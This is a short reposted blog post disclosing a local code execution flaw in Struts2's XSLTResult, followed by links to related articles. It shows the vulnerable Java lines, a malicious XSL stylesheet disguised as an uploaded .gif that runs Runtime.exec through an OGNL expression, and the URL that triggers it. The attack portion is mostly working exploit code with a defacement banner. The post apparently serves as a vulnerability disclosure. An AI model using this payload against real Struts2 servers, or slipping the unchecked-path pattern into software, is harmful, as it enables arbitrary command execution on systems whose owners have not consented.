struts2 xsltResult Local code execution vulnerability

转载 2012年03月26日 12:57:10

 

the file:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java

String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));

A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>

An attacker can upload a file:

/upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

open url

http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

then struts2 will execute

ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)

 

相关文章推荐

Struts2 S2-045 RCE Vulnerability Analysis & Brand New Exploit

I haved finished and developped a new exploit poc several days ago, it’s true I didn’t want to publi...

ajax + struts2 return 404 Code

场景描述: 项目上线已经5个多月了,一直很稳定,昨天晚上一个ajax界面突然返回404错误,一开始以为是url出现问题了,测试后发现发送请求后后台正常执行, 直到return SUCCESS时返回40...

Struts 2 Security Vulnerability - Dynamic Method Invocation

Introduction The Struts 2 web application framework has a long-standing security vulnerability that...

struts2 code

  • 2015-06-15 11:17
  • 34.55MB
  • 下载

Struts2 In Action - Source Code

  • 2011-12-06 23:09
  • 6.25MB
  • 下载

FAILED: Execution Error, return code 2 from org.apache.hadoop.hive.ql.exec.tez.TezTask

hive> select count(1) from customer; Query ID = hive_20151113120000_368645da-6763-4ca3-a774-8961d49...

Remote Code Execution as System User on Android 5 Samsung Devices abusing WifiCredService (Hotspot 2

This article explains a recently disclosed vulnerability, independently discovered by the Google's P...

Struts 2 + websocket handshake unexpected response code 404问题

环境: tomcat 7  + Struts 2 Spring4 MyBatis  服务端代码: @ServerEndpoint(value = "/wsServer", configurato...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)